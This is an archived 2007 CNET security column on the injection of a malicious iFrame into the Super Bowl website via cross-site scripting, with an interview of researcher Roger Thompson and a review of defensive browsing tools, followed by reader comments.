On MovieTome: TRANSFORMERS 2 SPOILERS!

Search:
Go!


advertisementUNLIMITED calls to 22 countries
Today on CNET
Reviews
News
Downloads
Tips & Tricks
CNET TV
Compare Prices
Blogs
Cell phones| Desktops| Digital cameras| Laptops| MP3 players| TVs| All Categories


Click Here
advertisement

Security Watch : Don't get burned by viruses and hackers
Hacking the Super Bowl

By Robert Vamosi 
Senior editor, CNET Reviews
February 16, 2007

Not too long ago, security researcher Roger Thompson had an epiphany. He already had his global distributed network of honeypots well established and had detected a more than a few breaking viruses. But the days of seeing new threats such as Sasser and Netsky, both of which lit up his switchboard instantly, were over. Now attacks light up one honeypot in one part of the world, then in another part, then another. The new attacks, he realized, were increasingly targeted and were being carefully meted out to avoid detection by honeypot networks such as his own. The attacks today are being discovered only by reading the honeypot log files well after the fact. Thompson realized that the current model was backward. Rather than sitting back and waiting for attacks to come to him, he needed a more active model; he needed to go and find the attacks as they are happening. And it's a good thing he made this paradigm shift. Shortly before the 2007 Super Bowl, thousands of visitors to the site quickly discovered how a perfectly legit Web site could also be the source of rather nasty Trojan horses.

Super Bowl exploits
At last week's RSA Conference in San Francisco, just days after the Super Bowl attack, I sat down with Thompson. On his laptop, he showed me the simple line of Javascript code that pointed Super Bowl site visitors to a known criminal hacker exploit server. Apparently, there was a cross-site scripting error on the official Super Bowl Web site that allowed some criminal hackers to inject a poisoned iFrame command. And it wasn't just the Super Bowl site--it turns out there were several others, mostly healthcare related, including the U.S. Centers for Disease Control.

Injecting malicious code onto legitimate Web sites is a deceptively simple to do--assuming the Web site is vulnerable, that is.

Injecting malicious code onto legitimate Web sites is a deceptively simple to do, assuming the Web site is vulnerable, that is. A criminal hacker needs little more than an Internet browser to accomplish his task. The criminal hackers who did this apparently surfed the Super Bowl site, appended the existing URL with a script tag and some code calling their exploit server, then revisited the site. As the HTTP page request passed to the Web server, the server read the script command and added the malicious iFrame code to the legitimate Super Bowl Web site. Future visitors to the site would now download that iFrame code.

Not a phishing site
There are tools available that will check and verify the relative security of Web sites. One, McAfee SiteAdvisor, ranks the relative safety of thousands of Web sites. But the defaced Super Bowl site was not a phishing site, so SiteAdvisor gave its healthy seal of approval. Thompson's own tool, Linkscanner Pro, actively scans the code as it is, reading the code as it's passed back from the Web server to your Web browser; it identified the exploit code and blocked it, while allow users to access the site safely.

Thompson has found that, at any given time, there are maybe a few dozen malware writers operating in the world.

What the Super Bowl, the CDC, and hundreds of other defaced sites have in common are central servers hosting malware script; in this case, it was code that exploited patchable Microsoft Windows vulnerabilities. The Internet Storm Center identified sites such as dv521.com (a domain located in China) as hosting the malicious javascripts (known only as 1.js, 2.js. 3.js) used in the Super Bowl and CDC defacements.

Whack a mole
Thompson, and others I spoke with at RSA, believe there are perhaps a handful of true malicious code geniuses working in the world today. You'll probably never know their names, but you might run across their handiwork from time to time on the Internet. Protecting these guys are Internet gangs that buy the malicious code, then distribute it by defacing Web sites such as the Super Bowl's or the CDC's to lure unsuspecting people into compromising their machines. Once compromised, a desktop PC could become part of a botnet, a spam relay, or a target of identity theft.

Thompson has found that, at any given time, there are maybe a few dozen malware writers operating in the world; indeed, the infected pages identified by Thompson's Linkscanner Pro often point to just a few dozen Web servers. If Thompson and others do shut down one exploit server site, the Internet gangs start using a different URL instead. Often the exploit servers are hosted in parts of the world where laws, language, or even basic understanding of the problem make it hard to remove the malicious content from the Internet.

Prevention
After using it for more than a week, I found Thompson's Linkscanner Pro is great at stopping the malicious code, but I also found it missed several reported phishing sites; it wasn't really designed for that. To identify and block phishing site, use the free Netcraft toolbar alongside Thompson's tool. I find that Netcraft consistently blocks suspected phishing sites better than some of the paid antiphishing protection.

Are you using a safe browsing tool. Why or why not? Will you start using one now? Talk back to me.
Security Bites Podcast
CNET News.com's Joris Evers and CNET.com's Robert Vamosi tell you about the latest security threats, what's coming, and how to protect your system. Listen now


CNET's free newsletters
Rob Vamosi's
award-winning
column on Internet threats and how to counter them 
Delivered Mondays
Sign up now        
All free newsletters



2/2/07
Windows Vista's half-cocked firewall

1/29/07
That $200 Windows XP service pack called Vista

1/19/07
Rootkits for fun and profit

More commentary



TalkBack
10 messages

Article discussion: Hacking the Super Bowl

Post a comment

Latest post:

"...on any browser."
by Fil0403 (See profile) - March 1, 2007 4:17 PM PST
Are you using a safe browsing tool? Yes, McAfee SiteAdvisor.

Why or why not? Because it's a wild world out there on the Internet, nowadays.

Will you start using one n... (Read more).
Sort by: Title |
Date
| Most helpful

we do windows at work

The policy at work is to use all MS all the time. Bummer. At home I don't use ... (Read more)
by Tooniner (See profile) - February 26, 2007 12:31 PM PST
0 out of 5 users found this comment helpful | 1 comment

what else to think about?

so how many more things are we going to have to think about while surfing the ne... (Read more)
by mrsteve0924 (See profile) - February 21, 2007 6:25 PM PST
5 out of 5 users found this comment helpful

Mozilla FireFox browser

I use Mozilla FireFox browser for the most part. I'm wondering if I'm more prote... (Read more)
by CalicoSilk (See profile) - February 20, 2007 10:13 PM PST
2 comments

Linkscanner website

You can find Linkscanner Lite and Pro at http://www.explabs.com/products/. There... (Read more)
by rspare (See profile) - February 20, 2007 6:12 AM PST
5 out of 5 users found this comment helpful

Linkscanner Pro

OK, how o we get a copy ? ? ?

The link that you gave in the article sayes... (Read more)
by redco (See profile) - February 19, 2007 6:26 PM PST
1 comment
Help Center|Newsletters|Corrections|What's New|All Product Reviews|
Search:
Go!

Popular topics: Apple | Antivirus | Cell Phones | Dell | Digital Camera | Firefox 3 | Games | iPhone | iPod | iTunes | Laptops | Norton | PS3 | Verizon | Wii | Xbox 360
CNET.com
About CNET|Today on CNET|Reviews|News|Compare prices|Tips & Tricks|Downloads|CNET TV
Popular on CBS sites: World News | Fantasy Football | Amy Winehouse | Baseball | E3 | Batman | Firefox 3 | iPhone 3G
About CNET Networks | Jobs | Advertise


© 2008 CNET Networks, Inc., a CBS Company. All rights reserved. | Privacy Policy | Terms of Use